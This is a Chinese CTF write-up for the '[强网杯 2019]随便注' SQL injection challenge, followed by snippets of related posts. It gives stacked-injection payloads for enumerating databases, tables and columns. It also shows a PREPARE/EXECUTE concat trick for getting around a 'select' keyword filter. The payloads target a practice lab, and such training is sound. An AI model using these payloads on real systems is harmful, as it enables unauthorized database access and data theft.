[强网杯 2019]随便注 1【SQL注入】解析过程
1.首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1
,测试一下是否存在sql注入。
2.提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
,说明后端参数后面有可能存在其他sql语句,我们在1' or 1 = 1后面加一个#,将可能存在的其他sql语句注释掉,即:1' or 1 = 1#
,成功输出了该表的所有数据,但是没有flag
3.那么存在sql注入,那么我们手动探测一下其他的表,首先判断一下字段个数:' union select 1,2;#
,系统提示return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
,preg_match函数用于执行正则表达式,也就是说,系统通过该代码将select等关键字都过滤了
4.既然select关键字无法使用,我们可以通过堆叠注入的方式,来绕过select关键字
5.查看数据库名:1';show databases;#
6.查看数据表:1';show tables;#
7.我们先来看一下第一个表1919810931114514的表结构,有两种方式:
方式一:1'; show columns from tableName;#
方式二:1';desc tableName;#
注意,如果tableName是纯数字,需要用`包裹,比如1';desc `1919810931114514`;#
获取到字段名为flag:
8. 因为select关键字被过滤了,所以我们可以通过预编译的方式拼接select 关键字:1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#
得flag:flag{c0fc32ff-8ae1-4b96-8da0-1f621d7fdae3}
FLAG:flag{ab1f3d33-af30-45b8-b1e9-f5a9915e4676}
[强网杯 2019]随便注 1【SQL注入】解析过程相关推荐
- 强网杯 2019]随便注 【SQL注入】四种解法
题目简介 题目名称:[强网杯 2019]随便注 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL注入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = ...
- buuctf [强网杯 2019]随便注 1
buuctf web [强网杯 2019]随便注 1 -刷题个人日记 小白一个,写给自己看. 打开后是这样. 从题目和内容来看就是一道sql注入题. 输入 1' or 1=1;# 这个#用来注释掉后面 ...
- [强网杯 2019]随便注 —— 堆叠注入
[强网杯 2019]随便注 前言 个人观点,若有误请指教 解题思路及步骤 直接上'引号,结果直接报错了,证明存在sql注入漏洞. 判断当前表 ...
- BUUCTF Web [强网杯 2019]随便注
「作者主页」:士别三日wyx 此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...
- [强网杯 2019]随便注 1
题目[强网杯 2019]随便注 1 题目来源:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4% ...
- BMZCTF 强网杯 2019 随便注 原理+题解
目录 知识点 堆叠注入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠注入 堆叠查询注入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开.而堆叠查询注入攻击就 ...
- BUUCTF [强网杯 2019]随便注
题目 打开环境发现是经典的提交界面 老规则还是查询注入点,1 or 1 =1#,1' order by 1#都未出错,但是1' union select 1,2#是出现了错误,发现一些查询语句被过滤了 ...
- BUUCTF-WEB:[强网杯 2019]随便注 1
题目环境:http://de044ac0-9162-4b83-b6a6-8c99ce0efe91.node3.buuoj.cn 打开环境: 尝试注入: 解题思路: 1.先尝试用union联合注入: 第 ...
- 【BUUCTF】强网杯 2019随便注1 write up
输入万能密码1' or 1=1# ,判断存在sql注入, SQL注入的万能密码实际上是利用了网址后台的漏洞,打开下面的网址不用密码和账号也可以登录后台. 万能密码原理: 万能密码能够绕过sql检测,在 ...
最新文章
- openpyxl.utils.exceptions.InvalidFileException: openpyxl does not support the old
- oracle 记录被另一个用户锁住
- roobo机器人怎么唱歌_智能机器人都长什么样?提前探秘中国智能机器人大赛
- 51单片机——My-Clock项目
- 可用等式为:html+java=jsp表示jsp[8]._java jsp
- NGINX原理 之 SLAB分配机制(转)
- 背景图片-密度屏幕(移动端)
- Sainkho Namtchylak-Old Melody那浓郁的忧伤
- oracle awr报告生成_[ORACLE],SQL性能报告(AWR)导出,扶你走上调优大神之路
- Aapache status / apache2ctl status 总是403
- 计算机一级考试题库字处理题库,全国计算机一级考试题库试题
- python合并pdf_一个用于合并pdf的简单Python脚本
- html使元素不被内容撑开,flex布局被子元素撑开,如何保持内容不超出容器
- 高并发网站架构与正态分布的前生今世
- 七天毁灭地球的十种方法
- osgEarth的Rex引擎原理分析(七十三)从高程文件读取的高程信息如何填充rex的高程瓦片
- 当运行pychrm时遇到please select a valid interpreter怎么解决
- 行业动荡, 犹如浮萍
- WH-引导名词从句练习题
- 洛谷P1957 口算练习题